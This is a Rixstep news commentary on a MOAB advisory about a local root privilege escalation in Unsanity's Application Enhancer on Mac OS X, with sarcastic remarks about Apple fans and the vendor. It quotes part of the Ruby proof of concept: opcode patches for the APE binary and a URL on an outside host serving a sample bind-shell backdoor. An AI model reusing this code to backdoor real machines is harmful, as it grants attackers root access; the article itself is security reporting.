Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Search | Test
Home » Industry Watch » A Totally Unsane Privilege Escalation

A Totally Unsane Privilege Escalation

The MOAB crew do it again.


If anyone doubted the MOAB team could do their thing; if anyone secretly wished OS X were so secure no one had to worry; if fanboys cringed at the thought someone would be so mean to their precious platform; then those sentiments were dashed last Friday with the release of the highly embarrassing 'repair permissions' advisory. The fanboys aren't quite back on their feet again and here comes the next blow.

Everyone's favourite Pandora's Box is affected by a local privilege escalation vulnerability which allows users to gain root privileges by either patching the APE binary or replacing it.

The POC drops a back door on the system by patching the original APE binary which results in the aped daemon running with root privileges.

require 'fileutils'

# Define offsets to opcodes to be patched
PATCH_INSTRUCTIONS =  [
                        [ 27512,  "\x38\x60\x00\x00"         ],
                        [ 115586, "\x31\xc0\x90\x89\x04\x24" ]
                      ]

BACKDOO_URL = "http://projects.info-pull.com/moab/bug-files/sample-back" # must be fat binary, sample bind shell
PATH_TO_APE = "/Library/Frameworks/ApplicationEnhancer.framework"
PATH_TO_APU = "/Library/Frameworks/ApplicationUnenhancer.framework"

path_to_bozo  = (ARGV[0] || File.join(PATH_TO_APE,"Versions/Current/ApplicationEnhancer"))

The POC is 'benign' enough to create a backup in case you really really want to keep using Unsanity's products after this.

Workaround

From the MOAB advisory.

Stay away from Application Enhancer. It's flawed, and not just by this particular issue. If the developers have left a binary executed with root privileges at an user writable path, they are certainly capable of doing other nonsense. The approach for fixing the MOAB issues is actually making Apple boost it's vulnerability handling process, and not leveraging the work to a jackass third party which has no security background at all and spends more time flaming and insulting on a delusional IRC channel than on real work (sic, stupidity is so vindictive). Wish the ZERT guys had time to work on the stuff, they rock the house and have skills.

Which sums it up nicely.


Don't let its elegant and easy-to-use interface fool you. Beneath the surface of Mac OS X lies an industrial-strength UNIX foundation hard at work to ensure that your computing experience remains free of system crashes and compromised performance. Time-tested security protocols in Mac OS X keep your Mac out of harm's way.
 - Apple Computer

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.